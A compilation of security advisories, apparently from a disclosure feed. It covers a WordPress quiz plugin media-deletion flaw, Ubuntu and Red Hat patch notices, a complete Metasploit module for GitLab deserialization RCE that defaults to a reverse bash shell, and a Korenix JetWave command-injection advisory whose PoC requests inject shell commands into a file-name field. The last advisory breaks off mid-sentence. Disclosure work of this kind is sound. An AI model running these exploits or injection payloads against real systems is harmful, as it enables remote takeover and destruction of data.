WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a missing authentication vulnerability that allows an attacker to delete media from the WordPress instance.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Quiz And Survey Master  
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/  
Type:           Missing Authentication for Critical Function [CWE-306]  
Date found:     2023-01-13  
Date published: 2023-02-08  
CVSSv3 Score:   7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)  
CVE:            CVE-2023-0291

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Quiz And Survey Master 8.0.8 and below

4. INTRODUCTION  
===============  
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used  
to create engaging content to drive traffic and increase user engagement.  
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee  
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated  
users which accepts a "media_id" parameter pointing to a any item uploaded through  
WordPress' media upload functionality. However, this "media_id" is afterward used  
in a forced wp_delete_attachment() call ultimately deleteing the media from the  
WordPress instance.

Successful exploits can allow an unauthenticated attacker to delete any (and all)  
uploaded WordPress media files.

6. PROOF OF CONCEPT  
===================  
The following Proof-of-Concept would delete the uploaded media with the ID "1":

POST /wp-admin/admin-ajax.php HTTP/2  
Host: localhost  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1

7. SOLUTION  
===========  
Update to version 8.0.9

8. REPORT TIMELINE  
==================  
2023-01-13: Discovery of the vulnerability  
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291  
2023-01-18: Sent initial notification to vendor via contact form  
2022-01-18: Vendor response  
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability  
2022-02-08: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

--  
Mit freundlichen Grüßen / With best regards / Atentamente

Julien Ahrens  
Freelancer | Penetration Tester

RCE Security  
VAT-ID: DE328576638  
Website: www.rcesecurity.com

This e-mail may contain confidential and/or privileged information.  
If you are not the intended recipient (or have received this e-mail in  
error) please notify the sender immediately and destroy this e-mail.  
Any unauthorized copying, disclosure or distribution of the material  
in this e-mail is strictly forbidden.

WordPress Quiz And Survey Master 8.0.8 Media Deletion

Ubuntu Security Notice 5870-1 - Ronald Crane discovered that APR-util did not properly handled memory when encoding or decoding certain input data. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5870-1  
February 14, 2023

APR-util vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

APR-util could be made to crash or run programs as an administrator  
if it received specially crafted input.

Software Description:  
- apr-util: Apache Portable Runtime Utility Library

Details:

Ronald Crane discovered that APR-util did not properly handled memory when  
encoding or decoding certain input data. An attacker could possibly use  
this issue to cause a denial of service, or possibly execute arbitrary  
code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   libaprutil1                     1.6.1-5ubuntu4.22.10.1

Ubuntu 22.04 LTS:  
   libaprutil1                     1.6.1-5ubuntu4.22.04.1

Ubuntu 20.04 LTS:  
   libaprutil1                     1.6.1-4ubuntu2.1

Ubuntu 18.04 LTS:  
   libaprutil1                     1.6.1-2ubuntu0.1

Ubuntu 16.04 ESM:  
   libaprutil1                     1.5.4-1ubuntu0.1~esm2

Ubuntu 14.04 ESM:  
   libaprutil1                     1.5.3-1ubuntu0.1~esm2

After a standard system update you need to restart any application  
using APR-util libraries to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5870-1  
   CVE-2022-25147

Package Information:  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-5ubuntu4.22.10.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-5ubuntu4.22.04.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-4ubuntu2.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-2ubuntu0.1

Ubuntu Security Notice USN-5870-1

An authenticated user can import a repository from GitHub into GitLab. If a user attempts to import a repo from an attacker-controlled server, the server will reply with a Redis serialization protocol object in the nested default_branch. GitLab will cache this object and then deserialize it when trying to load a user session, resulting in remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Git::SmartHttp  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::HTTP::Gitlab  include Msf::Exploit::RubyDeserialization  attr_accessor :cookie  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GitLab GitHub Repo Import Deserialization RCE',        'Description' => %q{          An authenticated user can import a repository from GitHub into GitLab.          If a user attempts to import a repo from an attacker-controlled server,          the server will reply with a Redis serialization protocol object in the nested          `default_branch`. GitLab will cache this object and          then deserialize it when trying to load a user session, resulting in RCE.        },        'Author' => [          'William Bowling (vakzz)', # discovery          'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module          'RedWay Security <https://infosec.exchange/@redway>', # PoC        ],        'References' => [          ['URL', 'https://hackerone.com/reports/1679624'],          ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC          ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],          ['CVE', '2022-2992']        ],        'DisclosureDate' => '2022-10-06',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),        OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),        OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),        OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])      ]    )    deregister_options('GIT_URI')  end  def group_name    @group_name ||= Rex::Text.rand_text_alpha(8..12)  end  def api_token    @api_token ||= gitlab_create_personal_access_token  end  def session_id    @session_id ||= Rex::Text.rand_text_hex(32)  end  def redis_payload(cmd)    serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)    gitlab_session_id = "session:gitlab:#{session_id}"    # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)    # The command set    # The gitlab session to load the payload from    # The Payload itself. A Ruby serialized command    "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"  end  def check    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie    vprint_status('Trying to get the GitLab version')    version = Rex::Version.new(gitlab_version)    return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (      version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||      version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||      version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))    )    report_vuln(      host: rhost,      name: name,      refs: references,      info: [version]    )    return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError    return CheckCode::Detected('Could not detect the version because authentication failed.')  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    return CheckCode::Unknown("#{e.class} - #{e.message}")  end  def cleanup    super    return unless @import_id    gitlab_delete_group(@group_id, api_token)    gitlab_revoke_personal_access_token(api_token)    gitlab_sign_out  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    print_error("#{e.class} - #{e.message}")  end  def exploit    if Rex::Socket.is_internal?(srvhost_addr)      print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")    end    setup_repo_structure    start_service({      'Uri' => {        'Proc' => proc do |cli, req|          on_request_uri(cli, req)        end,        'Path' => '/'      }    })    execute_command(payload.encoded)  rescue Timeout::Error => e    fail_with(Failure::TimeoutExpired, e.message)  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie    vprint_status("Session ID: #{session_id}")    vprint_status("Creating group #{group_name}")    # We need group id for the cleanup method    @group_id = gitlab_create_group(group_name, api_token)['id']    fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id    @redis_payload = redis_payload(cmd)    # import a repository from GitHub    vprint_status('Importing a repository from GitHub')    @import_id = gitlab_import_github_repo(      group_name: group_name,      github_hostname: get_uri,      api_token: api_token    )['id']    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id    # wait for the import tasks to finish    select(nil, nil, nil, datastore['IMPORT_DELAY'])    # execute the payload    send_request_cgi({      'uri' => normalize_uri(target_uri.path, group_name),      'method' => 'GET',      'keep_cookies' => false,      'cookie' => "_gitlab_session=#{session_id}"    })  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e    fail_with(Failure::Unknown, "#{e.class} - #{e.message}")  end  def setup_repo_structure    blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"    blob_data = Rex::Text.rand_text_alpha(5..12)    blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)    tree_data =      {        mode: '100644',        file_name: blob_object_fname,        sha1: blob_object.sha1      }    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)    commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)    git_objs = [ commit_obj, tree_object, blob_object ]    @refs =      {        'HEAD' => 'refs/heads/main',        'refs/heads/main' => commit_obj.sha1      }    @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)  end  # Handle incoming requests from GitLab server  def on_request_uri(cli, req)    super    headers = { 'Content-Type' => 'application/json' }    data = {}.to_json    case req.uri    when %r{/api/v3/rate_limit}      headers.merge!({        'X-RateLimit-Limit' => '100000',        'X-RateLimit-Remaining' => '100000'      })    when %r{/api/v3/repositories/(\w{1,20})}      id = Regexp.last_match(1)      name = Rex::Text.rand_text_alpha(8..12)      data = {        id: id,        name: name,        full_name: "#{name}/name",        clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"      }.to_json    when %r{/\w+/public.git/info/refs}      data = build_pkt_line_advertise(@refs)      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })    when %r{/\w+/public.git/git-upload-pack}      data = build_pkt_line_sideband(@packfile)      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })    when %r{/api/v3/repos/\w+/\w+}      bytes_size = rand(3..8)      data = {        'default_branch' => {          'to_s' => {            'bytesize' => bytes_size,            'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"            # using a simple string format for RESP          }        }      }.to_json    end    send_response(cli, data, headers)  endend

GitLab GitHub Repo Import Deserialization Remote Code Execution

Red Hat Security Advisory 2023-0651-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution esigned for on-premise or private cloud deployments.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.27 security update  
Advisory ID:       RHSA-2023:0651-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0651  
Issue date:        2023-02-15  
CVE Names:         CVE-2021-4238 CVE-2022-47629   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.27 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution esigned for on-premise or private  
cloud deployments.

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other elated information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
(BZ#2048600)

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:65e71a774a18c1c191f28655ce245abeecd653e8215b75f87eb23ceadacd530d

(For s390x architecture)  
The image digest is  
sha256:cfccfab6abf7cd74cffbc43e4ae38745f258cb28ff6360b0f433c7718d6f144b

(For ppc64le architecture)  
The image digest is sha256:  
e13089586d2061a41250e2b546259bef0c5c4995c704d0e2220ae516a1a675da

(For aarch64 architecture)  
The image digest is  
sha256:932754cfa58f41186a48ecff03c6345c59325fc7ff1496e91e57fa34752db142

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at:  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2048600 - Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-3507 - [4.11.z] Incorrect network configuration in worker node with two interfaces  
OCPBUGS-4340 - oc get dc fails when AllRequestBodies audit-profile is set in apiserver  
OCPBUGS-5459 - Topology sidebar actions doesn't show the latest resource data  
OCPBUGS-5926 - NMstate removes egressip in OpenShift cluster with SDN plugin  
OCPBUGS-6176 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11)  
OCPBUGS-6683 - [4.11]Improve Pod Admission failure for restricted-v2 denials that pass with restricted   
OCPBUGS-6837 - Add rpm-build to DTK image  
OCPBUGS-6907 - Image registry Operator does not use Proxy when connecting to openstack  
OCPBUGS-6920 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11,CNO)  
OCPBUGS-7033 - 4.11 error 524 from seccomp(2) when trying to load filter [rhel-8.6.0.z]   
OCPBUGS-7034 - 4.11 [iavf] It takes long time to create multiple VF interfaces and the VF interface names are not consistent [rhel-8.6.0.z]

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+zQA9zjgjWX9erEAQjY7Q//YWMAWAjecEvTomhKUA2d5zlkZ+5x85ce  
DRlz4l1m8INyBt6/6P7H03ahzq/3v50Zxr+SRL9trJS1V9VS9vD/n+YaIFr65gbG  
FivmQwH4tBNVjmxG4Lhn5Al87xXyJbvUHX3SRoluj1C7k8UHZBw2uhXo1bS7SHq7  
+K6e/+nXR2UroGdkDU/kB6xpMwSKE0pJrVo/xpaD9QgzGjtVXmbL3b0USEUeU3w1  
grQKknqqu7ItZaV3MgcA5DxDlOdl896Btd6/T/2RG20P2Zrf77LM5cAssiwwbDF7  
FzuU6Ve8i1oEAvHZlJjrqJyVMwF9oDjBlEdcjJKTTrpn3VeHVnEjv7l0eHcbGSsU  
kB1CpMC2UA/uQD3QDZhCpWUfybej3zuhY40lxmz5Tf/NKduX6J8uOb+0RdSYsVWr  
7Q5sp6ybngKDTLyzZJwvj/NfVuNqtkhcOXhFDeeoUjsj4ONV0PZakKj2FJfP464J  
JfLnyufhgfy03D4CbLqSeQxV9hPwW4CyQ5h46/zLtqKe06yh8LAf8fDsnkayk2h2  
I4xdIehgw1txDh8RO2d43y5i2DnSjNmacWhxWy38bNdRGxPUF36pnfjuG9T83Gw4  
iLaPQEeIVD/7692QNZO8cGntLtZoM7TkfwPAEEth3QC9JGM+TLtl2YwXQQWtxTNU  
wCGZORPJZyw=  
=sByk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0651-01

Red Hat Security Advisory 2023-0652-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.27. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.27 security update  
Advisory ID:       RHSA-2023:0652-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0652  
Issue date:        2023-02-15  
CVE Names:         CVE-2021-38561 CVE-2022-21698 CVE-2022-47629   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.27 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.11.27. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:0651

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-4754 - Race condition between PTP events and AMQ router startup

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+x7oNzjgjWX9erEAQiEOw//fWcLc4zdIR2RqMuYTi1YrzRB8VgPSewl  
hf77oNiJ5uoMAXyeMXctFWbmD7gQMjiDLmiVH7nCZjzm9VpbAsZ4SaHtWte+Qnrn  
OJlOmkRU6vrjPUxsfSA3mYjEIm5vtRgrG98SBbVKtcCCHao8cHXiJcYc8ZK39Uhr  
HvqR5CbOc+v4Vj1fx5CKtadJvLMDPbgGl/SoshaQe1OPa2PDASDU5WIUFa0dVbTS  
BJlkdEO/5K2anKedhJ3nfrsipmFb6WI9gEl5R6iS1zkPhlJpRE1tE75teIDTfE7h  
OVTZehbg/h2uHcBiPygGMNQtTTpB6U4qXuevW/AJHscaRo/1O4qHxkj0i1W41eV2  
6ArkvnICxKmKaGb9UEGnkqkCfZTANRQ1OumdUlcB/aPebcrgrWRGD2p8OMbr2cf3  
RA2y4cFCB6aPLZTM19+1sJS2yrBoodENjaNT0IjjtN+qoOgEVyhgxbPJnW4tPD58  
/BavTbnsIssQvt8oH/WKeg/1MCur0UlJI0eWue9MjekWDH5BenGCA5PW2wFYPQzo  
FcLtMRh82O4nXLB+c1eISN0w4DVaghoZLU7VUKYLFeN5ST776qoccRv9nTbcToQP  
Pc7FcKZQgkanFAbt/r0PwtGO8n9dJISaVSGKCmM/d2pAmokpNZbXROnaPjRayy0M  
L2+/D+9wqPc=  
=m9Cy  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0652-01

It was discovered that a race condition existed in the memory address space accounting implementation in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Sonke Huster discovered that a use-after-free vulnerability existed in the WiFi driver stack in the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 22.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

It was discovered that a race condition existed in the memory address  
space accounting implementation in the Linux kernel, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41222)

Sönke Huster discovered that a use-after-free vulnerability existed in  
the WiFi driver stack in the Linux kernel. A physically proximate  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-42719)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 91.1  
    azure - 91.1  
    gcp - 91.1  
    generic - 91.1  
    gke - 91.1  
    gkeop - 91.1  
    ibm - 91.1  
    lowlatency - 91.1

Ubuntu 18.04 LTS  
    aws - 91.1  
    azure - 91.1  
    gcp - 91.1  
    generic - 91.1  
    gke - 91.1  
    gkeop - 91.1  
    ibm - 91.1  
    lowlatency - 91.1

Ubuntu 22.04 LTS  
    aws - 91.1  
    azure - 91.1  
    gcp - 91.1  
    generic - 91.1  
    gke - 91.1  
    ibm - 91.1

Support Information

Kernels older than the levels listed below do not receive livepatch  
updates. If you are running a kernel version earlier than the one listed  
below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS  
    linux-aws-5.15 - 5.15.0-1000  
    linux-aws - 5.4.0-1009  
    linux-aws - 5.4.0-1061  
    linux-azure-5.15 - 5.15.0-1069  
    linux-azure - 5.4.0-1010  
    linux-gcp-5.15 - 5.15.0-1000  
    linux-gcp - 5.4.0-1009  
    linux-gke-5.15 - 5.15.0-1000  
    linux-gke - 5.4.0-1033  
    linux-gkeop - 5.4.0-1009  
    linux-hwe - 5.15.0-0  
    linux-ibm-5.15 - 5.15.0-1000  
    linux-ibm - 5.4.0-1009  
    linux-oem - 5.4.0-26  
    linux - 5.4.0-26

Ubuntu 18.04 LTS  
    linux-aws-5.4 - 5.4.0-1069  
    linux-aws - 4.15.0-1054  
    linux-aws - 4.15.0-1119  
    linux-azure-4.15 - 4.15.0-1115  
    linux-azure-5.4 - 5.4.0-1069  
    linux-gcp-4.15 - 4.15.0-1121  
    linux-gcp-5.4 - 5.4.0-1069  
    linux-gke-4.15 - 4.15.0-1076  
    linux-gke-5.4 - 5.4.0-1009  
    linux-gkeop-5.4 - 5.4.0-1007  
    linux-hwe-5.4 - 5.4.0-26  
    linux-ibm-5.4 - 5.4.0-1009  
    linux-oem - 4.15.0-1063  
    linux - 4.15.0-69

Ubuntu 16.04 ESM  
    linux-aws-hwe - 4.15.0-1126  
    linux-aws - 4.4.0-1098  
    linux-aws - 4.4.0-1129  
    linux-azure - 4.15.0-1063  
    linux-azure - 4.15.0-1078  
    linux-azure - 4.15.0-1114  
    linux-gcp - 4.15.0-1118  
    linux-hwe - 4.15.0-143  
    linux-hwe - 4.15.0-69  
    linux - 4.4.0-168  
    linux - 4.4.0-211

Ubuntu 22.04 LTS  
    linux-aws - 5.15.0-1000  
    linux-azure - 5.15.0-1000  
    linux-gcp - 5.15.0-1000  
    linux-gke - 5.15.0-1000  
    linux-ibm - 5.15.0-1000  
    linux - 5.15.0-24  
    linux - 5.15.0-25

Ubuntu 14.04 ESM  
    linux-lts-xenial - 4.4.0-168

References

-   CVE-2022-41222  
-   CVE-2022-42719

Kernel Live Patch Security Notice LNS-0091-1

Multiple versions of Korenix JetWave suffer from authenticated command injection and denial of service vulnerabilities.

    CyberDanube Security Research 20230213-0-------------------------------------------------------------------------------                 title| Multiple Vulnerabilities               product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S,                      | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L,                      | JetWave 2414/2114, JetWave 2424, JetWave 2460,                      | JetWave 3220/3420 V3    vulnerable version| See "Vulnerable Versions"         fixed version| See "Solution"            CVE number| requested                impact| High              homepage| https://korenix.com/                 found| 2022-11-28                    by| S. Dietz, T. Weber (Office Vienna)                      | CyberDanube Security Research                      | Vienna | St. Pölten                      |                      | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.[...]Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwidecustomer base covers different Sales channels, including end-customers, OEMs,system integrators, and brand label partners."Source:https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable Versions:-------------------------------------------------------------------------------The following firmware versions have been found to be vulnerable byCyberDanube:  * Korenix JetWave4221 HP-E <= V1.3.0  * Korenix JetWave 3220/3420 V3 < V1.7The following firmware versions have been identified to be vulnerable by thevendor:  * Korenix JetWave 2212G V1.3.T  * Korenix JetWave 2212X/2112S V1.3.0  * Korenix JetWave 2211C < V1.6  * Korenix JetWave 2411/2111 < V1.5  * Korenix JetWave 2411L/2111L < V1.6  * Korenix JetWave 2414/2114 < V1.4  * Korenix JetWave 2424 < V1.3  * Korenix JetWave 2460 < V1.6Vulnerability overview-------------------------------------------------------------------------------1) Authenticated Command InjectionThe web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, or controls various critical equipment via serial ports,more extensive damage in the corresponding network can be done by an attacker.2) Authenticated Denial of Web-ServiceWhen logged in, a user can issue a POST request such that the underlying binaryexits. The Web-Service becomes unavailable and cannot be accessed until thedevice gets rebooted.Proof of Concept-------------------------------------------------------------------------------1) Authenticated Command Injection1.a)The command "touch /tmp/poc" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formTFTPLoadSave HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 127Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/mgmtsaveconf.aspCookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45Upgrade-Insecure-Requests: 1submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit=============================================================================== The command gets executed as root and a file under the folder /tmp/ is created.1.b)The command "touch /tmp/poc2" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formSysCmd HTTP/1.1Host: 172.16.0.38Content-Type: application/x-www-form-urlencodedConnection: closeReferer: 172.16.0.38Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bbContent-Length: 40sysCmd=touch%20/tmp/poc2&submit-url================================================================================The command gets executed as root and a file under the folder /tmp/ 